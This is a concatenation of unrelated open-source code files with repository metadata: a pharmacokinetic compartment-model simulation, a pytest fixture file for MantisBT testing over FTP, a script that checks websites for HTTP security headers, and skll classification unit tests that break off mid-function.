"status": "200 OK",
"prefix": query,
"result": matches
})
| mit | -4,379,057,662,769,576,400 | 28.671756 | 83 | 0.545408 | false |
james-nichols/dtrw | compartment_models/PBPK_test.py | 1 | 5547 | #!/usr/local/bin/python3
# Libraries are in parent directory
import sys
sys.path.append('../')
import math
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pdb
from dtrw import *
class DTRW_PBPK(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + g_N
return creation
"""return np.array([(1. - np.exp(-self.dT * self.Qs[0] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[1] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[2] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[3] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[4] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[0] / (self.Vs[0] * self.Rs[0]))) * self.Xs[0,n] + \
(1. - np.exp(-self.dT * self.Qs[1] / (self.Vs[1] * self.Rs[1]))) * self.Xs[1,n] + \
(1. - np.exp(-self.dT * self.Qs[2] / (self.Vs[2] * self.Rs[2]))) * self.Xs[2,n] + \
(1. - np.exp(-self.dT * self.Qs[3] / (self.Vs[3] * self.Rs[3]))) * self.Xs[3,n] + \
(1. - np.exp(-self.dT * self.Qs[4] / (self.Vs[4] * self.Rs[4]))) * self.Xs[4,n] + \
g_N ])"""
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
return rates
class DTRW_PBPK_anom(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T, alpha):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK_anom, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
self.alpha = alpha
self.Ks[2] = calc_sibuya_kernel(self.N+1, self.alpha)
self.Ks[5] = calc_sibuya_kernel(self.N+1, self.alpha)
self.anom_rates = [None] * self.n_species
self.anom_rates[2] = self.Qs[2] / (self.Vs[2] * self.Rs[2])
self.anom_rates[5] = self.Qs[2] / (self.Vs[-1])
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[2] = self.removal_flux_anomalous(n)[5]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + self.removal_flux_anomalous(n)[2] + g_N
return creation
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[2,0] = 0.
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
rates[5,2] = 0.
return rates
T = 100.0
dT = 0.01
ts = np.arange(0., T, dT)
initial = [0., 0., 0., 0., 0., 0.]
mu = 0.5 # Kidney removal rate
V_max = 2.69
K_m = 0.59
# Compartment order: [P, R, F, K, L, A] = poorly perfused, richly perfused, fatty tissue, kidneys, liver, arterial blood
Vs = [28.6, 6.90, 15.10, 0.267, 1.508, 1.570]
Qs = [1.46, 1.43, 0.29, 1.14, 1.52]
Rs = [0.69, 0.79, 0.39, 0.80, 0.78]
alpha = 0.8
g = 1.0
g_T = 1.0
dtrw = DTRW_PBPK(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T)
dtrw_anom = DTRW_PBPK_anom(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T, alpha)
dtrw.solve_all_steps()
dtrw_anom.solve_all_steps()
max_level = max([dtrw.Xs[0,:].max(), dtrw.Xs[1,:].max(), dtrw.Xs[2,:].max(), dtrw.Xs[3,:].max(), dtrw.Xs[4,:].max(), dtrw.Xs[5,:].max()])
fig = plt.figure(figsize=(8,8))
plt.xlim(0,T)
plt.ylim(0,1.1 * max_level)
plt.xlabel('Time')
P, = plt.plot(ts, dtrw.Xs[0,:])
R, = plt.plot(ts, dtrw.Xs[1,:])
F, = plt.plot(ts, dtrw.Xs[2,:])
K, = plt.plot(ts, dtrw.Xs[3,:])
L, = plt.plot(ts, dtrw.Xs[4,:])
A, = plt.plot(ts, dtrw.Xs[5,:])
plt.legend([P, R, F, K, L, A], ["Poorly perfused", "Richly perfused", "Fatty tissue", "Kidneys", "Liver", "Arterial blood"])
Pa, = plt.plot(ts, dtrw_anom.Xs[0,:],'b:')
Ra, = plt.plot(ts, dtrw_anom.Xs[1,:],'g:')
Fa, = plt.plot(ts, dtrw_anom.Xs[2,:],'r:')
Ka, = plt.plot(ts, dtrw_anom.Xs[3,:],'c:')
La, = plt.plot(ts, dtrw_anom.Xs[4,:],'m:')
Aa, = plt.plot(ts, dtrw_anom.Xs[5,:],'y:')
plt.show()
T, = plt.plot(ts, dtrw.Xs.sum(0), 'k')
Ta, = plt.plot(ts, dtrw_anom.Xs.sum(0), 'k:')
plt.show()
| gpl-2.0 | 154,471,276,779,151,000 | 31.822485 | 137 | 0.491437 | false |
AndreyBalabanov/python_training_mantisBT | conftest.py | 1 | 2344 |
import pytest
import json
import os.path
from fixture.application import Application
import ftputil
from fixture.soap import SoapHelper
fixture = None
target = None
def load_config(file):
global target
if target is None:
config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), file)
with open(config_file) as f:
target = json.load(f)
return target
@pytest.fixture(scope="session")
def config(request):
return load_config(request.config.getoption("--target"))
@pytest.fixture
def app(request, config):
global fixture
browser = request.config.getoption("--browser")
if fixture is None or not fixture.is_valid():
fixture = Application(browser=browser, config=config)
fixture.session.login("administrator", "root")
return fixture
@pytest.fixture(scope="session", autouse=True)
def configure_server(request, config):
install_server_configuration(config['ftp']['host'], config['ftp']['username'], config['ftp']['password'])
def fin():
restore_server_configuration(config['ftp']['host'], config['ftp']['username'], config['ftp']['password'])
request.addfinalizer(fin)
def install_server_configuration(host, username, password):
with ftputil.FTPHost(host, username, password) as remote:
if remote.path.isfile("config_inc.php.bak"):
remote.remove("config_inc.php.bak")
if remote.path.isfile("config_inc.php"):
remote.rename("config_inc.php", "config_inc.php.bak")
remote.upload(os.path.join(os.path.dirname(__file__), "resources/config_inc.php"), "config_inc.php")
def restore_server_configuration(host, username, password):
with ftputil.FTPHost(host, username, password) as remote:
if remote.path.isfile("config_inc.php.bak"):
if remote.path.isfile("config_inc.php"):
remote.remove("config_inc.php")
remote.rename("config_inc.php.bak", "config_inc.php")
@pytest.fixture(scope="session", autouse=True)
def stop(request):
def fin():
fixture.session.ensure_logout()
fixture.destroy()
request.addfinalizer(fin)
return fixture
def pytest_addoption(parser):
parser.addoption("--browser", action="store", default="firefox")
parser.addoption("--target", action="store", default="target.json") | apache-2.0 | -5,682,501,227,056,088,000 | 31.569444 | 113 | 0.676195 | false |
secopsconsult/websitechecks | securityheaders.py | 1 | 2724 | #!/usr/bin/env python
'''
Script to check for the presence of Security headers and rate the site
More info:
https://securityheaders.io/
'''
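# Example invocation (illustrative; the flags are the ones defined in main() below):
#   python securityheaders.py -u https://example.com -a "Mozilla/5.0" -d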
import optparse
import mechanize
import sys
def validateHeaders(header, debug):
if (debug):
print "[+] Validating headers"
print "[~] Headers: " + str(header)
if (debug):
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: Header not Empty"
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: " + str(header.getheaders('Public-Key-Pins')[0])
else:
print "[~] No HPKP Header present"
if (debug):
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: Header not Empty"
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: " + str(header.getheaders('Content-Security-Policy')[0])
else:
print "[~] No CSP Header present"
if (debug):
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: Header not Empty"
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: " + str(header.getheaders('Strict-Transport-Security')[0])
else:
print "[-] No HSTS Header present"
return
def viewPage(url, agent, debug):
if ((url.startswith("http://") == False) and (url.startswith("https://") == False)):
url = "https://" + url
if (debug):
print "[+] Browsing : " +url.strip() +" As " + agent.strip()
browser = mechanize.Browser()
browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', agent),
                          ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
browser.set_handle_refresh(False)
    try:
        page = browser.open(url.strip())
    except Exception as err:
        print "[-] Unable to open URL: " + str(err)
        sys.exit(1)
    if (debug):
        print "[+] Response Code: " + str(page.code)
    return page.info()
def main():
# Options for the script
parser = optparse.OptionParser('Usage %prog% ' + " -u <url> -a <agent>")
parser.add_option('-u', dest='url', type='string', help='Specify the URL')
parser.add_option('-a', dest='agent', type='string', help='Specify the user agent')
parser.add_option('-d', dest='debug', action="store_true", default=False, help='Debug Mode')
(options, args) = parser.parse_args()
if (options.url == None):
print parser.usage
exit(0)
if (options.agent == None):
if (options.debug):
print "[-] No Useragent Set. Defaulting to Mozilla"
options.agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
header = viewPage(options.url, options.agent, options.debug)
validateHeaders(header, options.debug)
if __name__ == '__main__':
main()
| mit | -1,188,025,213,629,344,800 | 27.673684 | 100 | 0.647577 | false |
lukaszb/monolith | monolith/cli/base.py | 1 | 10479 | import os
import sys
import argparse
from collections import namedtuple
from monolith.compat import OrderedDict
from monolith.compat import unicode
from monolith.cli.exceptions import AlreadyRegistered
from monolith.cli.exceptions import CommandError
from monolith.utils.imports import get_class
Argument = namedtuple('Argument', 'args kwargs')
def arg(*args, **kwargs):
"""
Returns *Argument* namedtuple in format: ``(args, kwargs)``. In example::
>>> arg(1, 2, 'foo', 'bar')
Argument(args=(1, 2, 'foo', 'bar'), kwargs={})
>>> arg('a', 1, foo='bar')
Argument(args=('a', 1), kwargs={'foo': 'bar'})
"""
return Argument(args, kwargs)
class Parser(argparse.ArgumentParser):
"""
Subclass of ``argparse.ArgumentParser`` providing more control over output
stream.
"""
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stderr)
super(Parser, self).__init__(*args, **kwargs)
def _print_message(self, message, file=None):
if file is None:
file = self.stream
super(Parser, self)._print_message(unicode(message), file)
class ExecutionManager(object):
usage = None
completion = False
completion_env_var_name = ''
parser_cls = Parser
def __init__(self, argv=None, stderr=None, stdout=None):
if argv is None:
argv = [a for a in sys.argv]
self.prog_name = os.path.basename(argv[0])
self.argv = argv[1:]
self.registry = {}
self.stderr = stderr or sys.stderr
self.stdout = stdout or sys.stdout
for name, Command in self.get_commands_to_register().items():
self.register(name, Command)
def get_usage(self):
"""
Returns *usage* text of the main application parser.
"""
return self.usage
def get_parser(self):
"""
Returns :class:`monolith.cli.Parser` instance for this
*ExecutionManager*.
"""
parser = self.parser_cls(prog=self.prog_name, usage=self.get_usage(),
stream=self.stderr)
subparsers = parser.add_subparsers(
title='subcommands',
)
for name, command in self.registry.items():
cmdparser = subparsers.add_parser(name, help=command.help)
for argument in command.get_args():
cmdparser.add_argument(*argument.args, **argument.kwargs)
command.setup_parser(parser, cmdparser)
cmdparser.set_defaults(func=command.handle)
return parser
def register(self, name, Command, force=False):
"""
Registers given ``Command`` (as given ``name``) at this
*ExecutionManager*'s registry.
:param name: name in the registry under which given ``Command``
should be stored.
:param Command: should be subclass of
:class:``monolith.cli.base.BaseCommand``
:param force: Forces registration if set to ``True`` - even if another
command was already registered, it would be overridden and no
            exception would be raised. Defaults to ``False``.
:raises AlreadyRegistered: If another command was already registered
under given ``name``.
"""
if not force and name in self.registry:
raise AlreadyRegistered('Command %r is already registered' % name)
command = Command(self.prog_name, self.stdout)
command.manager = self
self.registry[name] = command
command.post_register(self)
def get_commands(self):
"""
Returns commands stored in the registry (sorted by name).
"""
commands = OrderedDict()
for cmd in sorted(self.registry.keys()):
commands[cmd] = self.registry[cmd]
return commands
def get_commands_to_register(self):
"""
Returns dictionary (*name* / *Command* or string pointing at the
command class.
"""
return {}
def call_command(self, cmd, *argv):
"""
Runs a command.
:param cmd: command to run (key at the registry)
:param argv: arguments that would be passed to the command
"""
parser = self.get_parser()
args = [cmd] + list(argv)
namespace = parser.parse_args(args)
self.run_command(namespace)
def execute(self, argv=None):
"""
Executes command based on given arguments.
"""
if self.completion:
self.autocomplete()
parser = self.get_parser()
namespace = parser.parse_args(argv)
if hasattr(namespace, 'func'):
self.run_command(namespace)
def run_command(self, namespace):
try:
namespace.func(namespace)
except CommandError as err:
sys.stderr.write('ERROR: %s\n' % err.message)
sys.exit(err.code)
def autocomplete(self):
"""
If *completion* is enabled, this method would write to ``self.stdout``
completion words separated with space.
"""
if self.completion_env_var_name not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
current = cwords[cword-1]
except IndexError:
current = ''
cmd_names = self.get_commands().keys()
if current:
self.stdout.write(unicode(' '.join(
[name for name in cmd_names if name.startswith(current)])))
sys.exit(1)
class SimpleExecutionManager(ExecutionManager):
def __init__(self, program, commands):
"""
:param program: name of the program under which commands would be
executed (usually name of the program).
:param commands: dictionary mapping subcommands to proper command
classes. Values can be string - in that case proper command class
would be importer and used. Example::
{
'subcommand1': SomeCommand,
'subcommand2': 'myprogram.commands.another.AnotherCommand',
}
"""
self.simple_commands = commands
super(SimpleExecutionManager, self).__init__([program])
def get_commands_to_register(self):
"""
Returns dictionary with commands given during construction. If value is
a string, it would be converted into proper class pointer.
"""
return dict((key, get_class(value)) for key, value in
self.simple_commands.items())
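# Typical wiring, as a sketch (the program and command names are illustrative,
# not part of this module):
#
#     manager = SimpleExecutionManager('myprogram', {
#         'greet': 'myprogram.commands.GreetCommand',
#     })
#     manager.execute(['greet', '--name', 'monolith'])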
class BaseCommand(object):
"""
Base command class that should be subclassed by concrete commands.
**Attributes**
- ``help``: Help description for this command. Defaults to empty string.
- ``args``: List of :class:`Argument` instances. Defaults to empty list.
- ``prog_name``: Program name of *ExecutionManager* within which this
command is run. Defaults to ``None``.
- ``stdout``: File-like object. Command should write to it. Defaults to
``sys.stdout``.
"""
help = ''
args = []
def __init__(self, prog_name=None, stdout=None):
self.prog_name = prog_name or ''
self.stdout = stdout or sys.stdout
def get_args(self):
"""
Returns list of :class:`Argument` instances for the parser. By default,
it returns ``self.args``.
"""
return self.args or []
def setup_parser(self, parser, cmdparser):
"""
This would be called when command is registered by ExecutionManager
after arguments from ``get_args`` are processed.
Default implementation does nothing.
:param parser: Global argparser.ArgumentParser
:param cmdparser: Subparser related with this command
"""
def handle(self, namespace):
"""
Handles given ``namespace`` and executes command. Should be overridden
at subclass.
"""
raise NotImplementedError
def post_register(self, manager):
"""
Performs actions once this command is registered within given
``manager``. By default it does nothing.
"""
pass
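# Minimal concrete command, as a sketch (``GreetCommand`` and its argument are
# illustrative, not part of this module):
#
#     class GreetCommand(BaseCommand):
#         help = 'Prints a greeting'
#         args = [arg('-n', '--name', default='world')]
#
#         def handle(self, namespace):
#             self.stdout.write('Hello %s\n' % namespace.name)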
class LabelCommand(BaseCommand):
"""
    Command that works on given positional arguments (*labels*). By default, at
    least one *label* is required. This is controlled by the *labels_required*
    attribute.
**Extra attributes**:
- ``labels_required``: If ``True``, at least one *label* is required,
otherwise no positional arguments could be given. Defaults to ``True``.
"""
labels_required = True
def get_labels_arg(self):
"""
Returns argument for *labels*.
"""
nargs = self.labels_required and '+' or '*'
return arg('labels', nargs=nargs)
def get_args(self):
return self.args + [self.get_labels_arg()]
def handle(self, namespace):
"""
Handles given ``namespace`` by calling ``handle_label`` method
for each given *label*.
"""
        if namespace.labels:
            for label in namespace.labels:
                self.handle_label(label, namespace)
        else:
            self.handle_no_labels(namespace)
def handle_label(self, label, namespace):
"""
Handles single *label*. Should be overridden at subclass.
"""
raise NotImplementedError
def handle_no_labels(self, namespace):
"""
        Performs some action if no *labels* were given. By default it does
nothing.
"""
pass
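# Sketch of a LabelCommand subclass (illustrative only): ``handle_label`` runs
# once for every positional argument supplied on the command line.
#
#     class TouchCommand(LabelCommand):
#         def handle_label(self, label, namespace):
#             open(label, 'a').close()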
class SingleLabelCommand(BaseCommand):
"""
Command that works on given positional argument (*label*).
    **Extra attributes**:
    - ``label_default_value``: If no *label* was given, this is the default
      value that would be passed to ``namespace``. Defaults to ``None``.
"""
label_default_value = None
def get_label_arg(self):
"""
Returns argument for *label*.
"""
return arg('label', default=self.label_default_value, nargs='?')
def get_args(self):
return self.args + [self.get_label_arg()]
def handle(self, namespace):
"""
Calls ``handle_label`` method for given *label*.
"""
self.handle_label(namespace.label, namespace)
def handle_label(self, label, namespace):
"""
Handles *label*. Should be overridden at subclass.
"""
raise NotImplementedError
| bsd-2-clause | -1,535,403,399,572,830,500 | 30.280597 | 79 | 0.597958 | false |
jbazik/cmsplugin-video-youtube | cmsplugin_video_youtube/cms_plugins.py | 1 | 1467 | from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cmsplugin_video_youtube.models import YouTubeVideo
from cmsplugin_video_youtube.forms import YouTubeVideoForm
class YouTubeVideoPlugin(CMSPluginBase):
model = YouTubeVideo
name = _("YouTubeVideo")
render_template = "cmsplugin_video_youtube/embed.html"
form = YouTubeVideoForm
text_enabled = True
fieldsets = (
(None, {
'fields': ('name', 'video_id', 'width', 'height'),
}),
('Advanced Options', {
'classes': ('collapse',),
'fields': (
'fullscreen',
'autohide',
'autoplay',
'color',
'controls',
'iv_load',
'loop',
'modestbranding',
'playlist',
'related',
'showinfo',
'start',
'theme',
),
}),
)
def render(self, context, instance, placeholder):
context.update({
'object': instance,
'placeholder': placeholder
})
return context
def icon_src(self, instance):
return u"http://img.youtube.com/vi/%s/default.jpg" % instance.video_id
def icon_alt(self, instance):
return u"%s" % instance
plugin_pool.register_plugin(YouTubeVideoPlugin)
| lgpl-3.0 | 6,135,923,229,854,246,000 | 26.166667 | 78 | 0.537151 | false |
crossroadchurch/paul | tests/functional/openlp_core_common/test_applocation.py | 1 | 10285 | # -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
Functional tests to test the AppLocation class and related methods.
"""
import copy
import os
from unittest import TestCase
from openlp.core.common import AppLocation, get_frozen_path
from tests.functional import patch
FILE_LIST = ['file1', 'file2', 'file3.txt', 'file4.txt', 'file5.mp3', 'file6.mp3']
class TestAppLocation(TestCase):
"""
A test suite to test out various methods around the AppLocation class.
"""
def get_data_path_test(self):
"""
Test the AppLocation.get_data_path() method
"""
with patch('openlp.core.common.applocation.Settings') as mocked_class, \
patch('openlp.core.common.AppLocation.get_directory') as mocked_get_directory, \
patch('openlp.core.common.applocation.check_directory_exists') as mocked_check_directory_exists, \
patch('openlp.core.common.applocation.os') as mocked_os:
# GIVEN: A mocked out Settings class and a mocked out AppLocation.get_directory()
mocked_settings = mocked_class.return_value
mocked_settings.contains.return_value = False
mocked_get_directory.return_value = os.path.join('test', 'dir')
mocked_check_directory_exists.return_value = True
mocked_os.path.normpath.return_value = os.path.join('test', 'dir')
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_data_path()
# THEN: check that all the correct methods were called, and the result is correct
mocked_settings.contains.assert_called_with('advanced/data path')
mocked_get_directory.assert_called_with(AppLocation.DataDir)
mocked_check_directory_exists.assert_called_with(os.path.join('test', 'dir'))
self.assertEqual(os.path.join('test', 'dir'), data_path, 'Result should be "test/dir"')
def get_data_path_with_custom_location_test(self):
"""
Test the AppLocation.get_data_path() method when a custom location is set in the settings
"""
with patch('openlp.core.common.applocation.Settings') as mocked_class,\
patch('openlp.core.common.applocation.os') as mocked_os:
# GIVEN: A mocked out Settings class which returns a custom data location
mocked_settings = mocked_class.return_value
mocked_settings.contains.return_value = True
mocked_settings.value.return_value.toString.return_value = 'custom/dir'
mocked_os.path.normpath.return_value = 'custom/dir'
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_data_path()
# THEN: the mocked Settings methods were called and the value returned was our set up value
mocked_settings.contains.assert_called_with('advanced/data path')
mocked_settings.value.assert_called_with('advanced/data path')
self.assertEqual('custom/dir', data_path, 'Result should be "custom/dir"')
def get_files_no_section_no_extension_test(self):
"""
Test the AppLocation.get_files() method with no parameters passed.
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.os.listdir') as mocked_listdir:
# GIVEN: Our mocked modules/methods.
mocked_get_data_path.return_value = 'test/dir'
mocked_listdir.return_value = copy.deepcopy(FILE_LIST)
# When: Get the list of files.
result = AppLocation.get_files()
# Then: check if the file lists are identical.
self.assertListEqual(FILE_LIST, result, 'The file lists should be identical.')
def get_files_test(self):
"""
Test the AppLocation.get_files() method with all parameters passed.
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.os.listdir') as mocked_listdir:
# GIVEN: Our mocked modules/methods.
mocked_get_data_path.return_value = os.path.join('test', 'dir')
mocked_listdir.return_value = copy.deepcopy(FILE_LIST)
# When: Get the list of files.
result = AppLocation.get_files('section', '.mp3')
# Then: Check if the section parameter was used correctly.
mocked_listdir.assert_called_with(os.path.join('test', 'dir', 'section'))
# Then: check if the file lists are identical.
self.assertListEqual(['file5.mp3', 'file6.mp3'], result, 'The file lists should be identical.')
def get_section_data_path_test(self):
"""
Test the AppLocation.get_section_data_path() method
"""
with patch('openlp.core.common.AppLocation.get_data_path') as mocked_get_data_path, \
patch('openlp.core.common.applocation.check_directory_exists') as mocked_check_directory_exists:
# GIVEN: A mocked out AppLocation.get_data_path()
mocked_get_data_path.return_value = os.path.join('test', 'dir')
mocked_check_directory_exists.return_value = True
# WHEN: we call AppLocation.get_data_path()
data_path = AppLocation.get_section_data_path('section')
# THEN: check that all the correct methods were called, and the result is correct
mocked_check_directory_exists.assert_called_with(os.path.join('test', 'dir', 'section'))
self.assertEqual(os.path.join('test', 'dir', 'section'), data_path, 'Result should be "test/dir/section"')
def get_directory_for_app_dir_test(self):
"""
Test the AppLocation.get_directory() method for AppLocation.AppDir
"""
# GIVEN: A mocked out _get_frozen_path function
with patch('openlp.core.common.applocation.get_frozen_path') as mocked_get_frozen_path:
mocked_get_frozen_path.return_value = os.path.join('app', 'dir')
# WHEN: We call AppLocation.get_directory
directory = AppLocation.get_directory(AppLocation.AppDir)
# THEN: check that the correct directory is returned
self.assertEqual(os.path.join('app', 'dir'), directory, 'Directory should be "app/dir"')
def get_directory_for_plugins_dir_test(self):
"""
Test the AppLocation.get_directory() method for AppLocation.PluginsDir
"""
# GIVEN: _get_frozen_path, abspath, split and sys are mocked out
with patch('openlp.core.common.applocation.get_frozen_path') as mocked_get_frozen_path, \
patch('openlp.core.common.applocation.os.path.abspath') as mocked_abspath, \
patch('openlp.core.common.applocation.os.path.split') as mocked_split, \
patch('openlp.core.common.applocation.sys') as mocked_sys:
mocked_abspath.return_value = os.path.join('plugins', 'dir')
mocked_split.return_value = ['openlp']
mocked_get_frozen_path.return_value = os.path.join('plugins', 'dir')
mocked_sys.frozen = 1
mocked_sys.argv = ['openlp']
# WHEN: We call AppLocation.get_directory
directory = AppLocation.get_directory(AppLocation.PluginsDir)
# THEN: The correct directory should be returned
self.assertEqual(os.path.join('plugins', 'dir'), directory, 'Directory should be "plugins/dir"')
def get_frozen_path_in_unfrozen_app_test(self):
"""
Test the _get_frozen_path() function when the application is not frozen (compiled by PyInstaller)
"""
        with patch('openlp.core.common.sys') as mocked_sys:
# GIVEN: The sys module "without" a "frozen" attribute
mocked_sys.frozen = None
# WHEN: We call _get_frozen_path() with two parameters
frozen_path = get_frozen_path('frozen', 'not frozen')
# THEN: The non-frozen parameter is returned
self.assertEqual('not frozen', frozen_path, '_get_frozen_path should return "not frozen"')
def get_frozen_path_in_frozen_app_test(self):
"""
Test the get_frozen_path() function when the application is frozen (compiled by PyInstaller)
"""
with patch('openlp.core.common.sys') as mocked_sys:
# GIVEN: The sys module *with* a "frozen" attribute
mocked_sys.frozen = 1
# WHEN: We call _get_frozen_path() with two parameters
frozen_path = get_frozen_path('frozen', 'not frozen')
# THEN: The frozen parameter is returned
self.assertEqual('frozen', frozen_path, 'Should return "frozen"')
| gpl-2.0 | 8,223,613,109,412,259,000 | 51.47449 | 118 | 0.602333 | false |
ernfrid/skll | tests/test_classification.py | 1 | 12834 | # License: BSD 3 clause
"""
Tests related to classification experiments.
:author: Michael Heilman ([email protected])
:author: Nitin Madnani ([email protected])
:author: Dan Blanchard ([email protected])
:author: Aoife Cahill ([email protected])
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import csv
import glob
import itertools
import json
import os
from io import open
from os.path import abspath, dirname, exists, join
import numpy as np
from nose.tools import eq_, assert_almost_equal, raises
from sklearn.base import RegressorMixin
from skll.data import FeatureSet
from skll.data.writers import NDJWriter
from skll.config import _parse_config_file
from skll.experiments import run_configuration
from skll.learner import Learner
from skll.learner import _DEFAULT_PARAM_GRIDS
from utils import (make_classification_data, make_regression_data,
make_sparse_data, fill_in_config_paths_for_single_file)
_ALL_MODELS = list(_DEFAULT_PARAM_GRIDS.keys())
_my_dir = abspath(dirname(__file__))
def setup():
train_dir = join(_my_dir, 'train')
if not exists(train_dir):
os.makedirs(train_dir)
test_dir = join(_my_dir, 'test')
if not exists(test_dir):
os.makedirs(test_dir)
output_dir = join(_my_dir, 'output')
if not exists(output_dir):
os.makedirs(output_dir)
def tearDown():
train_dir = join(_my_dir, 'train')
test_dir = join(_my_dir, 'test')
output_dir = join(_my_dir, 'output')
config_dir = join(_my_dir, 'configs')
if exists(join(train_dir, 'train_single_file.jsonlines')):
os.unlink(join(train_dir, 'train_single_file.jsonlines'))
if exists(join(test_dir, 'test_single_file.jsonlines')):
os.unlink(join(test_dir, 'test_single_file.jsonlines'))
if exists(join(output_dir, 'rare_class.predictions')):
os.unlink(join(output_dir, 'rare_class.predictions'))
for output_file in glob.glob(join(output_dir, 'train_test_single_file_*')):
os.unlink(output_file)
config_file = join(config_dir, 'test_single_file.cfg')
if exists(config_file):
os.unlink(config_file)
def check_predict(model, use_feature_hashing=False):
"""
This tests whether predict task runs and generates the same
number of predictions as samples in the test set. The specified
model indicates whether to generate random regression
or classification data.
"""
# create the random data for the given model
if issubclass(model, RegressorMixin):
train_fs, test_fs, _ = \
make_regression_data(use_feature_hashing=use_feature_hashing,
feature_bins=5)
# feature hashing will not work for Naive Bayes since it requires
# non-negative feature values
elif model.__name__ == 'MultinomialNB':
train_fs, test_fs = \
make_classification_data(use_feature_hashing=False,
non_negative=True)
else:
train_fs, test_fs = \
make_classification_data(use_feature_hashing=use_feature_hashing,
feature_bins=25)
# create the learner with the specified model
learner = Learner(model.__name__)
# now train the learner on the training data and use feature hashing when
# specified and when we are not using a Naive Bayes model
learner.train(train_fs, grid_search=False)
# now make predictions on the test set
predictions = learner.predict(test_fs)
# make sure we have the same number of outputs as the
# number of test set samples
eq_(len(predictions), test_fs.features.shape[0])
# the runner function for the prediction tests
def test_predict():
for model, use_feature_hashing in \
itertools.product(_ALL_MODELS, [True, False]):
yield check_predict, model, use_feature_hashing
# the function to create data with rare labels for cross-validation
def make_rare_class_data():
"""
    Create data with five instances per class for three labels; within each
    group of five, only a single feature fires per instance.
"""
ids = ['EXAMPLE_{}'.format(n) for n in range(1, 16)]
y = [0] * 5 + [1] * 5 + [2] * 5
X = np.vstack([np.identity(5), np.identity(5), np.identity(5)])
feature_names = ['f{}'.format(i) for i in range(1, 6)]
features = []
for row in X:
features.append(dict(zip(feature_names, row)))
return FeatureSet('rare-class', ids, features=features, labels=y)
def test_rare_class():
"""
Test cross-validation when some labels are very rare
"""
rare_class_fs = make_rare_class_data()
prediction_prefix = join(_my_dir, 'output', 'rare_class')
learner = Learner('LogisticRegression')
learner.cross_validate(rare_class_fs,
grid_objective='unweighted_kappa',
